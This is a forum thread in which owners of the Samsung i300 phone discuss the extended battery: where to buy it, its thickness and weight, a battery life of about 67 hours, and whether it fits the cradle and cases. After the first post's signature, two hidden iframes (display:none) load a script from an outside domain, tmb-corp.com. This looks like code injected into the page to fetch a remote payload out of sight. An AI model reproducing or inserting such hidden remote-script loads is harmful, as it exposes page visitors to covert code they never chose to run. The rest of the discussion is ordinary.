+ Reply to Thread

Extended Battery now available

at samsungs store:

http://www.samsungusa.com

anyone get theirs yet?

Brooks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Brooks:
    Thanks for the heads up. Seems like I have been checking every day, and the one day I don't check, they are available. I ordered 2 of them. The extended battery will fulfil my last complaint about the phone.... geez, now what am I going to do?
    Carl

Administrator

Arrow

the regular batts are doing well for me as i spend most of my time surfing on ebay or playing golf, but i would appreciate it if you guys would give us a review of the extended batts when you get them in!

yea, I'd like to see a nice closeup picture of the I300 with extended battery.... to see how much bigger it is...

Brooks

This might be a silly question, but does anyone know if the extended battery will fit in the cradle for charging?
    Carl

Administrator

Arrow

yes, the ext. batt will fit in the cradle.

Has enyone received their extended batteries yet? I ordered mine on Sunday, and on Monday got an email saying they were shipped via UPS Ground. I still have not seen them. I am wondering about any reports on the size of the batteries, do they make the phone substantially bigger or heavier and how much better is the battery life?
    Carl

Administrator

Arrow

well, taking a stab at it, i would imagine the batery will add some weight, but im sure not much. i do believe the back of the batt is a little thicker though...

but please someone who has theirs speak up!

FINALLY.... I recieved my extended batteries today. They are about twice as thick as the regular battery. My charger is at home (and I am at the office), So I have no report on their longevity. I will charge one up tonight and use if over the weekend and let you guys know what I think. Also, I will tak a picture of the regular battery and extended side by side. As far as weight goes, the regular battery weights 1.2 oz, the extended battery weighs in at 1.8 oz.
    Carl

Where are you all buying these extended batteries from? I went to the samsungusa.com site but it lists the extended battery as out of stock! Any help in getting an extended battery would be appreciated!

dee
    oh, you're supposed to READ the manual....

Dee:
    I got mine from Samsung USA web site. They have been listed as out of stock for a long time, but last Sunday Brooks posted that they were available at the samsung site. I ordered 2 last Sunday, and received them yesterday. Sounds like they are out of stock again. Good luck finding them.
    Carl

Found them for 64.99 at Marquel's. It's a cell phone accessory website.

dee

http://www.marquel.com/store/sph-i300.html
    oh, you're supposed to READ the manual....

I have receive my extended batteries. So far so good. I started using one on Sat PM, about 6pm, and so far I still have the same battery in and have not charged it at all. I have 1 bar remaining (out of three).

I am not sure if this is going to work, but I am going to try to attach 2 pictures, one showing the phone with the extended battery in it, and the other showing the standard battery and the extended battery side by side.

Carl
    Attached Thumbnails Attached Thumbnails Extended Battery now available-dscn0492.jpg  

Extended battery in the phone. Sorry, the quality is no very good on this one.
    Carl
    Attached Thumbnails Attached Thumbnails Extended Battery now available-dscn0490.jpg  

thanks for the pics!

Brooks

I take it that the phone won't fit in the cradel with the extended batt?

THAT is a good question. To be honest, I NEVER use the cradle to charge batteries in the phone. I rotate my batteries, charge them off line and run them totally dead. I know with Lion it does not make a difference, but old habits are hard to break. When I get home I will see if the phone with the extended battery fits in the cradle. I may run home for lunch, so I can check then.
    cjg

Nice to live close to work. I bopped home at lunch and sure enough, the i300 w/the extended battery fits fine in the sync cradle. If you look at the shape of the back of the cradle, it is shaped to accomodate the larger profile of the extended battery. BTW, the first extended battery test died today. I went about 67 hours of mixed cell/pda use. With the standards batteries, I was generally getting about 40 hours. for my money, they are worth it. (especially since they are the same price as the std battery). The profile is a bit larger, but I can ALWAYS use a standard battery if I want to carry the phone in my pants pocket or my shirt pocket. The phone does fit fine with the extended battery in the Taget special $10 case.
    cjg

I wonder if it will fit in the new E&B cases?

My guess is yes. The extended battery only adds about 1/4 of an inch to the total depth of the phone.
    cjg